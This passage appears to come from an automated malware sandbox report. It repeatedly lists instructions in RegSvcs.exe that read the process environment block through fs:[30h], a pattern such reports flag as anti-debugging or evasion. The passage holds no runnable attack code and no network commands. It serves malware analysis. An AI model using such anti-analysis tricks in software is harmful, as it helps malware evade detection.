          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE016 mov eax, dword ptr fs:[00000030h]14_2_016EE016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017120F0 mov ecx, dword ptr fs:[00000030h]14_2_017120F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D80E9 mov eax, dword ptr fs:[00000030h]14_2_016D80E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA0E3 mov ecx, dword ptr fs:[00000030h]14_2_016CA0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017560E0 mov eax, dword ptr fs:[00000030h]14_2_017560E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CC0F0 mov eax, dword ptr fs:[00000030h]14_2_016CC0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017520DE mov eax, dword ptr fs:[00000030h]14_2_017520DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017960B8 mov eax, dword ptr fs:[00000030h]14_2_017960B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017960B8 mov ecx, dword ptr fs:[00000030h]14_2_017960B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C80A0 mov eax, dword ptr fs:[00000030h]14_2_016C80A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017680A8 mov eax, dword ptr fs:[00000030h]14_2_017680A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D208A mov eax, dword ptr fs:[00000030h]14_2_016D208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177437C mov eax, dword ptr fs:[00000030h]14_2_0177437C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01778350 mov ecx, dword ptr fs:[00000030h]14_2_01778350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov eax, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov eax, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov eax, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov ecx, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov eax, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175035C mov eax, dword ptr fs:[00000030h]14_2_0175035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179A352 mov eax, dword ptr fs:[00000030h]14_2_0179A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A634F mov eax, dword ptr fs:[00000030h]14_2_017A634F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01752349 mov eax, dword ptr fs:[00000030h]14_2_01752349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A8324 mov eax, dword ptr fs:[00000030h]14_2_017A8324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A8324 mov ecx, dword ptr fs:[00000030h]14_2_017A8324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A8324 mov eax, dword ptr fs:[00000030h]14_2_017A8324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A8324 mov eax, dword ptr fs:[00000030h]14_2_017A8324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A30B mov eax, dword ptr fs:[00000030h]14_2_0170A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A30B mov eax, dword ptr fs:[00000030h]14_2_0170A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A30B mov eax, dword ptr fs:[00000030h]14_2_0170A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CC310 mov ecx, dword ptr fs:[00000030h]14_2_016CC310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F0310 mov ecx, dword ptr fs:[00000030h]14_2_016F0310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E03E9 mov eax, dword ptr fs:[00000030h]14_2_016E03E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017063FF mov eax, dword ptr fs:[00000030h]14_2_017063FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE3F0 mov eax, dword ptr fs:[00000030h]14_2_016EE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE3F0 mov eax, dword ptr fs:[00000030h]14_2_016EE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE3F0 mov eax, dword ptr fs:[00000030h]14_2_016EE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017743D4 mov eax, dword ptr fs:[00000030h]14_2_017743D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017743D4 mov eax, dword ptr fs:[00000030h]14_2_017743D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E3DB mov eax, dword ptr fs:[00000030h]14_2_0177E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E3DB mov eax, dword ptr fs:[00000030h]14_2_0177E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E3DB mov ecx, dword ptr fs:[00000030h]14_2_0177E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177E3DB mov eax, dword ptr fs:[00000030h]14_2_0177E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA3C0 mov eax, dword ptr fs:[00000030h]14_2_016DA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D83C0 mov eax, dword ptr fs:[00000030h]14_2_016D83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D83C0 mov eax, dword ptr fs:[00000030h]14_2_016D83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D83C0 mov eax, dword ptr fs:[00000030h]14_2_016D83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D83C0 mov eax, dword ptr fs:[00000030h]14_2_016D83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178C3CD mov eax, dword ptr fs:[00000030h]14_2_0178C3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017563C0 mov eax, dword ptr fs:[00000030h]14_2_017563C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F438F mov eax, dword ptr fs:[00000030h]14_2_016F438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F438F mov eax, dword ptr fs:[00000030h]14_2_016F438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CE388 mov eax, dword ptr fs:[00000030h]14_2_016CE388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CE388 mov eax, dword ptr fs:[00000030h]14_2_016CE388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CE388 mov eax, dword ptr fs:[00000030h]14_2_016CE388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C8397 mov eax, dword ptr fs:[00000030h]14_2_016C8397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C8397 mov eax, dword ptr fs:[00000030h]14_2_016C8397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C8397 mov eax, dword ptr fs:[00000030h]14_2_016C8397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C826B mov eax, dword ptr fs:[00000030h]14_2_016C826B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780274 mov eax, dword ptr fs:[00000030h]14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D4260 mov eax, dword ptr fs:[00000030h]14_2_016D4260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D4260 mov eax, dword ptr fs:[00000030h]14_2_016D4260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D4260 mov eax, dword ptr fs:[00000030h]14_2_016D4260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A625D mov eax, dword ptr fs:[00000030h]14_2_017A625D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178A250 mov eax, dword ptr fs:[00000030h]14_2_0178A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178A250 mov eax, dword ptr fs:[00000030h]14_2_0178A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6259 mov eax, dword ptr fs:[00000030h]14_2_016D6259
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01758243 mov eax, dword ptr fs:[00000030h]14_2_01758243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01758243 mov ecx, dword ptr fs:[00000030h]14_2_01758243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CA250 mov eax, dword ptr fs:[00000030h]14_2_016CA250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C823B mov eax, dword ptr fs:[00000030h]14_2_016C823B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E02E1 mov eax, dword ptr fs:[00000030h]14_2_016E02E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E02E1 mov eax, dword ptr fs:[00000030h]14_2_016E02E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E02E1 mov eax, dword ptr fs:[00000030h]14_2_016E02E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A62D6 mov eax, dword ptr fs:[00000030h]14_2_017A62D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA2C3 mov eax, dword ptr fs:[00000030h]14_2_016DA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA2C3 mov eax, dword ptr fs:[00000030h]14_2_016DA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA2C3 mov eax, dword ptr fs:[00000030h]14_2_016DA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA2C3 mov eax, dword ptr fs:[00000030h]14_2_016DA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DA2C3 mov eax, dword ptr fs:[00000030h]14_2_016DA2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E02A0 mov eax, dword ptr fs:[00000030h]14_2_016E02A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E02A0 mov eax, dword ptr fs:[00000030h]14_2_016E02A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov eax, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov ecx, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov eax, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov eax, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov eax, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017662A0 mov eax, dword ptr fs:[00000030h]14_2_017662A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E284 mov eax, dword ptr fs:[00000030h]14_2_0170E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E284 mov eax, dword ptr fs:[00000030h]14_2_0170E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01750283 mov eax, dword ptr fs:[00000030h]14_2_01750283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01750283 mov eax, dword ptr fs:[00000030h]14_2_01750283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01750283 mov eax, dword ptr fs:[00000030h]14_2_01750283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170656A mov eax, dword ptr fs:[00000030h]14_2_0170656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170656A mov eax, dword ptr fs:[00000030h]14_2_0170656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170656A mov eax, dword ptr fs:[00000030h]14_2_0170656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8550 mov eax, dword ptr fs:[00000030h]14_2_016D8550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8550 mov eax, dword ptr fs:[00000030h]14_2_016D8550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE53E mov eax, dword ptr fs:[00000030h]14_2_016FE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE53E mov eax, dword ptr fs:[00000030h]14_2_016FE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE53E mov eax, dword ptr fs:[00000030h]14_2_016FE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE53E mov eax, dword ptr fs:[00000030h]14_2_016FE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE53E mov eax, dword ptr fs:[00000030h]14_2_016FE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0535 mov eax, dword ptr fs:[00000030h]14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01766500 mov eax, dword ptr fs:[00000030h]14_2_01766500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4500 mov eax, dword ptr fs:[00000030h]14_2_017A4500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4500 mov eax, dword ptr fs:[00000030h]14_2_017A4500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4500 mov eax, dword ptr fs:[00000030h]14_2_017A4500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4500 mov eax, dword ptr fs:[00000030h]14_2_017A4500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4500 mov eax, dword ptr fs:[00000030h]14_2_017A4500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4500 mov eax, dword ptr fs:[00000030h]14_2_017A4500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4500 mov eax, dword ptr fs:[00000030h]14_2_017A4500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE5E7 mov eax, dword ptr fs:[00000030h]14_2_016FE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE5E7 mov eax, dword ptr fs:[00000030h]14_2_016FE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE5E7 mov eax, dword ptr fs:[00000030h]14_2_016FE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE5E7 mov eax, dword ptr fs:[00000030h]14_2_016FE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE5E7 mov eax, dword ptr fs:[00000030h]14_2_016FE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE5E7 mov eax, dword ptr fs:[00000030h]14_2_016FE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE5E7 mov eax, dword ptr fs:[00000030h]14_2_016FE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FE5E7 mov eax, dword ptr fs:[00000030h]14_2_016FE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D25E0 mov eax, dword ptr fs:[00000030h]14_2_016D25E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170C5ED mov eax, dword ptr fs:[00000030h]14_2_0170C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170C5ED mov eax, dword ptr fs:[00000030h]14_2_0170C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A5D0 mov eax, dword ptr fs:[00000030h]14_2_0170A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A5D0 mov eax, dword ptr fs:[00000030h]14_2_0170A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D65D0 mov eax, dword ptr fs:[00000030h]14_2_016D65D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E5CF mov eax, dword ptr fs:[00000030h]14_2_0170E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E5CF mov eax, dword ptr fs:[00000030h]14_2_0170E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017505A7 mov eax, dword ptr fs:[00000030h]14_2_017505A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017505A7 mov eax, dword ptr fs:[00000030h]14_2_017505A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017505A7 mov eax, dword ptr fs:[00000030h]14_2_017505A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F45B1 mov eax, dword ptr fs:[00000030h]14_2_016F45B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F45B1 mov eax, dword ptr fs:[00000030h]14_2_016F45B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E59C mov eax, dword ptr fs:[00000030h]14_2_0170E59C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D2582 mov eax, dword ptr fs:[00000030h]14_2_016D2582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D2582 mov ecx, dword ptr fs:[00000030h]14_2_016D2582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01704588 mov eax, dword ptr fs:[00000030h]14_2_01704588
